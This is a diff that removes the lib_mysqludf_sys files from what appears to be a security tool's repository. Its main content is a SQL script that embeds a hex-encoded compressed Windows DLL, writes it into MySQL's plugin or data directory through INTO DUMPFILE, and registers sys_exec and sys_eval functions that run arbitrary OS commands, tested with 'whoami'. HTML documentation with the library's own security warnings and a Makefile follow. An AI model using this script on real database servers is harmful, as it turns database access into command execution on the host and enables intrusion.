--- lib_mysqludf_sys.dll: 9216 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_mysqludf_sys.dll: 6656 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000ad137127e9721f74e9721f74e9721f74e00a8c74eb721f74e00a8a74e8721f74e00a9c74e7721f74e00a9b74eb721f742a7d4274ea721f74e9721e74c0721f74e00a9674e8721f74e00a8d74e8721f74e00a8e74e8721f7452696368e9721f7400000000000000000000000000000000504500004c010300ce2e8e490000000000000000e00002210b010900001000000010000000600000507c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020040010000100000100000000010000010000000000000100000007c830000b8010000b4820000c800000000800000b402000000000000000000000000000000000000348500001000000000000000000000000000000000000000000000000000000000000000000000001c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e303300555058210d090209285e83bd2629a7f017550000480c000000240000260000eb);
-UPDATE udftest SET data=CONCAT(data,0xffcbffff8b442408833800741956578b7c2414b90c00be000010e8f3a566a56edd92ff5fb0015ec332c0c3cc2f0c2ab907fbeddbcf26111c8bf8288b4c24182ca45fc7011e16f7cf0eac5e2ecc5f0175128b4004676430f76e750a2c04c6010155710a1db2d8f3113ca4723f8b484df7efbe021152ff15968083c40485c075084514c365dffeff8bc8568d71018a114184d275f98b54142bce890a4019bb6dba7f4c39026b74186d07b0df4b06688b419974158db6ae9d9d88f3fdc7b61100230c5d37f6df85048b108d44110250899859108d893c19a16b1990173c0611b05b4a68935fe70f464085ed767732740a890aff254aa0c31f6fdb42fb53568b745b1d78734602088b46f6eddb2fd18d5c39010a525157e8300c108b5617d6de65fb02c60407974e5104219d1c76fb36c95342d2c4185357220300ad6cae843f005f5e995bc34f9099c309830c20af0b03a8c35dc242dc0081ec10305bd7f85ba102200033c489842c0d8b0620dcdc373f8c2424538b9c241c07556a01db2038360214893d515397f0fcc7de6dd76863cc5033ff14948bd8538d4c24287063edae3251895c421688debe712b6c435355904c8d5001084084c9cb63bf5d2bc22e8d2c3b55563b848bf054dde6842f528d043eb48c24511334db70d8634f528bfd4d20c4b38b5ebf6d4678105d53189c803eb3c67436c6443b04fbee3eff0063eb038d);
-UPDATE udftest SET data=CONCAT(data,0x490068fc6c0d3f777b5f8901205e5bd8e633cc7e0375bceee17481c401c31418f4935f0f0fecad221bc602011e3b0d2275c60cfff602f3c3e90807318bff5668805fb778ffdd7e56c07c5959a3062358045485f67505dbb07be133c040748326004908ff270929098e36d6fde8c70424063b0b5923d2efddbffdff558bec51510a39450c750e39056b107e3cff7337deb51bb37d0cb50910488b096957897c6cdd770a23480f85d47d641718ec797677db6d5135202c893d50bb1e50eb184af0c1febba705f43bc7741768e803a8306a0057aedbdeb02ed63ae7eb07c72c013ca12feddeddf04c6a025e9d096a1f920aa6eb3caa10bcae7deffd04b4c7051f281aa0e027fdfbbeb3075cf120b004ac1b9a59893573a576e32b085939b2f26973dfeebdfb34393d155c741c68062809dc430dd8f65ae1ff751034252316fff1acb919be54ee01dc0801a1db76367b6378d665fc00dfdb0fd4ac3dc944fc83f80266d26dec1b1b595bffa0584b7031fb0e376daf45d70f8487c7195413a5bbb6401e8b141810897d563fb6f5edef043bc87251833f6cf36a74390774e92d3cdbdaff372620f8108907b9f8b8bd599b5615441b474df86bdf1adf900c394d1003d00874b4890902886db76d0c1a0860eba7f60c3d881163564d442e38200bdb5758064c32fc3f5079811d8e4390c9c2e96a1068cd7de37712d8d0d88bd2f28b5d08);
-UPDATE udftest SET data=CONCAT(data,0x1c548597ddede433c95cfc897d2008fc3bf15abfdb5a8c393a4417e4f906ea3bf07405db16defd83fe02752ea152dc3bc1749e565fd03b7066e1865ee4000393113bd983fbf1d2141680120ab22735bb61ebfe642464205750135e436cb60e002f52d2061137ecafd153f76a0375434f34871df66c032168742e2c257febe3ad81851b71ec3409aae050516468854be5ac1065e8f62fb65ddb70fad2feff001907032ae4a4ae3dee070b1dc396ec16ff3bf07885d3246a1b5419de5da07d54550c0d05f8595d38b4a1dc8a22e928035f2120e6e6e6cd43051c891518891d14893569b6efe610893d0c668c1838060d2c666996661d0805042558fbee96002d7ffc9c8f14309556ed9f3fdb240704288d4508348b85e0fca05d3b1b63aa7095011c1920c6d8d6b12413180958c0091cb32c9fbb6b608985d8320a04dc57e01bc3031834687edf8f7d9af1ec596af75010e00a20833dd83bac7d2000f923685b1b7c4f9fc0244928c9c380401ef292223b2e5f6a144a13001531e9b190aaf8a29cc6e107bf7359eb676a08a904598fedd61d921b27355934e0f5f31d6e85bf03e4507f4b7c8cad6d5f506efe1cdc142cd6e2c4582a5b09e01b14f46393e525db08dfdc6c0bfe73130ab9d94e1e43f7d81bc0fa36edde0359485d1656b807c8be0457e946c75f503bc6730f8b0753025083c7b3f21c567afe72f13025d0d0f68dd8);
-UPDATE udftest SET data=CONCAT(data,0x14cc632f08b84d5a287f57bac466b374045262413c03c18138501bfcfb974575ef33d2b90b011c48180f94b0c29a6209895d7f3fd748b65b81df31c80fb74114a20571063357c5c6d20de908180b76de7db5ffffdf8a0c3bf972098b580803d93bfb720a4283c0283bd672e86a1c0ed933d94e4f6afe9d17705c30d00635640cfc5083c3ad31ccec0823316033c56a7c86d277f064a31a892a46096877843e2c49f0d2094c7574559734cb645f2d1350198c083b41b8f05b2d24c1e81ff709e00183bbedd40a034f170059948be5ebd84e6a969701ca3da3c0fab216ec14972fbb3191b111bacc1e540540fcb8a491444ca312aa10dc9d5c87b1095f14c3a45cb4c7acfbef5400d75cb6d9968e6c038d2be0fafcc11a68cef13ca8fc8a039b0403710dc395707018679651481473e2e3ddcdd86903786851d70ab142efe19c56a30e68f885225b7cf892bf4ee640bb25eea0397866760d85c3255aa39f0a358e04eb60ca78116bed935d388b7598920bae0c32b640f007080c9dfed66e672710b4f4330c113bf77507be4fe0b768ef59eb0b85f30a95c1e0100bf0a1f4b147c200f7d607045e5f5bb43f1919191b5005585c60811d1919646ca4000004c84305038700feff50a1172f4e6f20617267756d656e7473ddffffdf096c6c6f77656420287564663a206c69625f6d7973716c0d5f3f32f7b773085f696e666f293918);
-UPDATE udftest SET data=CONCAT(data,0x20766572777fdbfe73696f6e20302e01331f45787065637447657861eddb6f6f076c79201a65207374723f672074791b806d6d6b7572617121722bb065013b7477911f3f1f30f7968672206e4148436f756cdbb6636f246e6f74c463611320186d27a204766e79af660048b5ffffe66e201712c0015253445360a91de01b43b243bdf182720ea1bdf958d103c502633a5c4476476e6efb6edb8a539674b0735c41646d0769bed6fe7f6b938e2e57324b335354454e5550444106336d7bfbf665736b16705c7368c9655c762675be23a1b9ff5f6370705f70726f6af83e6ccb3e65ff5c52656c65617365182e706462c97c2716c8351bc707d0674d259b0ff50707069d92c3bad303e727cc08e3e84ed8810fd81f0a6b037f56a82090209e2b1210008d4516c1beb119bf44ff003400301855ff01162100e9b03c53505c100103c0bf00c7456e7669726f6edbbb2fdb7f5661726961626c6541184743757272145072ecf640fe6f636573734964546805616413d61a001f5469636ba1150dbd01d0fe51756572795003c36d616ef6de5aac37160e184469735937ffcbdf7e4c6962726a7943616c6c73497344656275676765db63ae9572685c96556e684064626f6f6f3164457846707469a146696c4adb52b6c219b4125417c9da0640a0611e11b65bdbbe49906c0c6b409d6d7087656bcd35e747517f77555122b6bb65091b);
-UPDATE udftest SET data=CONCAT(data,0x5c537973186d0bafbbd0ee2b41737365094c69ddeef634405f686974396d5f2e5fdffedaf6616d73670878110b646a753a5f666469fbb0f6bb760d5f4370705863b9b65f63721b05ec076164035f686f6f6b4bb800b6f62f636a835f1c75017c01a55f1d735ec16dce0a1f0a6c2164ad58b0adf02a17096e75131346982c0f652f5f3dd65cdbda723456fe6d1c187b0af67db1b7035f706f52296e1064687b2f80ef756c5e6d75a61bdcd696252cb3066ed633b8ed19d82508661167efbd83db5a9ce4790835c7b73773ad32c06e4d0fd76f737bcd950d75667216232e00ffffff1f19274b254920211c2f63183427310c0917251217136517090705160cbffdffff1e080a0b160918181505061b050c10060717062105110f061421110b93efffdb082b2205070d111d0d18532d4838060007d9fead950848330a090b0c0510051616f76fff760e0b34150b18160d3d0542b605121e14066932c7dae67f110c0e1d4d0517230d0c24082400f0a2410be2ff042804f0280104e008041cca0fab7f43d64c010500ce2e8e4938e000642160f902210b01090e6612f6bdc972121710090b021ed27cb3c905070360045bf6deef32f61e40012a0207069fb9dc062703b7013c230f40e7a6cc6c4fb000500227ec40565dc0771cd9d0214207926e59002fac2e746c36d8e66578741a0c900eb74260ddd287602e72647661ab08fb6b);
-UPDATE udftest SET data=CONCAT(data,0x0e5bc20a1302402e2649d374dffe032730021c0bd6b84dc04f737235ebb0d10860df731e4f4dc920cdcd5e4f980150223e72fb4d421b242412a052445300000000000000000900ff0000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d870f02000080207f8060287f585054);
-UPDATE udftest SET data=CONCAT(data,0x505357ffd558618d4424806a0039c475fa83ec80e9f998ffff00000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300010c02200100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x0000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d);
-UPDATE udftest SET data=CONCAT(data,0x6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000ca2e8e49000000003a840000010000000f0000000f000000a4830000e08300001c840000301000004012000000100000501200004012000010120000f01100004012000010120000a010000040120000601000009011000070110000e01000004f84000065840000828400009d840000a6840000b6840000c4840000cd840000);
-UPDATE udftest SET data=CONCAT(data,0xdd840000eb840000f3840000028500000f850000178500002685000000000100020003000400050006000700080009000a000b000c000d000e006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e6974000000700000100000005d3c583e5c3e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-
-
--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- The DLL must be in can be in C:\Program Files\MySQL\MySQL Server M.m\lib\plugin
--- 
--- Note that C:\Program Files\MySQL\MySQL Server M.m\lib\plugin DOES NOT
--- exist by default so it is NOT possible to save the DLL in the proper
--- folder where MySQL server looks for DLLs.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The DLL can be only in C:\Program Files\MySQL\MySQL Server M.n\lib\plugin
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 6.0/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 6.0
--- 
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
--- C:\WINDOWS\system32, @@basedir\bin or @@datadir (tested on MySQL 4.1.22
--- and MySQL 5.0.67 with NO plugin_dir set in my.ini configuration file,
--- which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 4.1/data/lib_mysqludf_sys.dll'; -- On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.0/data/lib_mysqludf_sys.dll'; -- On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/data/lib_mysqludf_sys.dll'; -- On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user SYSTEM does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into @@datadir. It is a valid PATH where MySQL
--- looks for DLL
-SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.dll';
--- The followings will save into @@datadir\mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.dll';
--- SELECT data FROM udftest INTO DUMPFILE '\lib_mysqludf_sys.dll';
--- The following will save into C:\. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.dll';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_mysqludf_sys.txt'); -- %TEMP% path is C:\WINDOWS\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/lib_mysqludf_sys/doc/lib_mysqludf_sys.html

@@ -1,278 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<link rel="stylesheet" type="text/css" href="../mysqludf.css"/>
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<title>lib_mysqludf_sys - A library of MySQL UDFs for working with the environment in which MySQL runs</title>
-</head>
-<body>
-	<div>
-		<a href="../index.html">Top</a>
-	|	<a href="../mysql_udf_repository_libraries.html">Up</a>
-	</div>
-	<h1>lib_mysqludf_sys</h1>
-	<div>
-		<a href="lib_mysqludf_sys.html">Documentation</a>
-	|	<a href="lib_mysqludf_sys.so">Binary</a>
-	|	<a href="lib_mysqludf_sys.sql">Installation</a>
-	|	<a href="lib_mysqludf_sys.c">Source</a>
-	|	<a href="lib_mysqludf_sys_0.0.2.tar.gz">tar.gz</a>
-	</div>
-	<p>
-		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
-	</p>
-	<ol>
-		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
-		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
-		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
-	</ol>
-	<p>
-		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
-	</p>
-	
-
-	<a name="sys_eval"></a><h2>sys_eval</h2>
-	<p>
-		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_eval(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			Whatever output the command pushed to the standard output stream.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_eval;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-
-	<a name="sys_exec"></a><h2>sys_exec</h2>
-	<p>
-		<code>sys_exec</code> takes one command string argument and executes it.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_exec(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			An (integer) exit code returned by the executed process.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_exec;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-	<a name="sys_get"></a><h2>sys_get</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_get([<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			If the variable exists, a string containing the value of the environment variable.
-			If the variable does not exist, the function return NULL.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_get RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_get;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		The variables known in the environment where mysql runs are freely accessible using this function.
-		Any user can get access to potentially secret information, such as
-		the user that is running mysqld, the path of the user's home directory etc.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<a name="sys_set"></a><h2>sys_set</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_set([<b>arg1, arg2</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt><code><b>arg2</b></code></dt>
-		<dd>
-			An expression that contains the value that is to be assigned to the environment variable.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			0 if the assignment or creation succeed.
-			non-zero otherwise.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_set RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_set;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		This function will overwrite existing environment variables.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-</body>
-</html

extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile

@@ -1,6 +0,0 @@
-LIBDIR=/usr/lib
-
-install:
-	gcc -Wall -I/usr/include/mysql -O1 -shared src/lib_mysqludf_sys.c -o so/lib_mysqludf_sys.so
-	strip -sx so/lib_mysqludf_sys.so
-	sudo cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql

@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
